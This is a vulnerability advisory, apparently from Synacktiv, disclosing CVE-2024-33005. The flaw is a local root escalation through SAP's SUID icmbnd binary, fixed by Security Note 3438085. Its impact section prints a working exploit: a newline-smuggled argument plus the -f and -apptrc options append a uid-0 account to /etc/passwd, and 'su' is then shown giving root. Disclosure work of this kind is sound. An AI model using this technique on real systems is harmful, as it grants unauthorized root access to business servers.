Local Privilege Escalation in SAP

31/10/2024 - Téléchargement

Product

SAP External Bind

Severity

Medium

Fixed Version(s)

Security Note 3438085

Affected Version(s)

SAP External Bind 7.77

CVE Number

CVE-2024-33005

Authors

Julien Egloff

Description

Presentation

With the SAP S/4HANA family, SAP is providing a new generation of business applications – best-of-breed enterprise software for big data, designed to help you run simple in the digital economy.

The SAP S/4HANA family is fully built on the in-memory platform SAP HANA. Using the advanced potential of SAP HANA, these products are designed for your digital business and provide instant insight into what is going on in your business by using a single source of truth, real-time processes as well as dynamic planning and analysis. With SAP Fiori user experience and a less complex data model, they are designed to run simple, and in parallel reduce the data footprint of your company.

Issue(s)

The icmbnd binary present on some SAP distributions has the SUID bit set and can be manipulated into writing into arbitrary files, allowing to elevate privileges to root.

Timeline

Date Description
2024.02.07 Advisory sent to SAP
2024.08.13 Security note 3438085 released
2024.10.31 Public release

 

Technical details

Local privilege escalation

Description

The icmbnd binary is present on some SAP systems and can be found at the following path: /sapmnt/{SID}/exe/uc/linuxx86_64/icmbnd. It has the following permissions by default, allowing members of the sapsys group to execute it as root.

$ ls -l /sapmnt/{INSTANCEID}/exe/uc/linuxx86_64/icmbnd
-rwsr-x--- 1 root sapsys 2718568 Jan 21  2023 /sapmnt/{INSTANCEID}/exe/uc/linuxx86_64/icmbnd

The following options are available:

$ ./icmbnd -h
Usage: icmbnd <options>
with the following options:
-v[ersion]                      display version info and exit
-S <ServerPort>                 listen port of the controlling program (eg. icman)
-H <hostname>                   hostname to bind port to (default: all names)
-l <port for listen>            servicename or portnumber
-p <protocol>                   protocol to use (HTTP, HTTPS, SMTP)
-i <virt host idx>                      index of the virtual host(default: -1)
-k <keep_alive_timeout>         keep alive timeout for this port
-K <proc_timeout>               Processing timeout for this port
-c verify_client <val>          SSL client verification option (0,1,2)
-t <trace_level>                tracelevel (default:1)
-f <trace_file>]                name of the tracefile (default: dev_icmbnd)
-apptrc                         append to existing tracefile

The -f and -apptrc arguments can be used to specify an arbitrary log file and append data to it. If an incorrect value is specified in mandatory options, it is reflected in this log file.

Impact

 This behavior can be abused to add arbitrary data to sensitive files, such as a user to /etc/passwd:

$ ./icmbnd -S '443' -f /etc/passwd -apptrc -p HTTP -l '443
> synacktiv:[...]:0:0::/root:/bin/sh
> abc'
icmbnd: NiListen failed for 443
synacktiv:[...]:0:0::/root:/bin/sh
abc (rc=-8): NIEINVAL
IcmBndConnect: IcmConnect to port 443 failed (rc=-10)
icmbnd: IcmBndConnect (rc=-10)

The content of /etc/passwd is then verified:

$ cat /etc/passwd
[...]
{SID}adm:x:20020:1002:SAP System Administrator:/home/{SID}adm:/bin/csh

---------------------------------------------------
trc file: "passwd", trc level: 1, release: "789"
---------------------------------------------------

[Thr 140102972481920] Wed Feb  7 10:37:06 2024
[Thr 140102972481920] systemid:   390 (AMD/Intel x86_64 with Linux)
[Thr 140102972481920] version:    7890
[Thr 140102972481920] patchlevel: 0    (server: 0)
[Thr 140102972481920] patchno:    69    (server: 74)
[Thr 140102972481920] intno       0    (server: 0)
[Thr 140102972481920] make:       multithreaded, Unicode, 64 BIT
[Thr 140102972481920] pid:        29938
[Thr 140102972481920] 
[Thr 140102972481920] *** WARNING => NiServerHandle: parameter invalid (strlenU(pServName) >= NI_MAX_SERVNAME_LEN) [nixx.c       263]
[Thr 140102972481920] *** ERROR => icmbnd: NiListen failed for 443
synacktiv:[...]:0:0::/root:/bin/sh
[...]

Even though logs are inconsistent with the expected format for /etc/passwd entries, the new user can still login:

$ su - synacktiv
Password: 
# id
uid=0(synacktiv) gid=0(root) groups=0(root)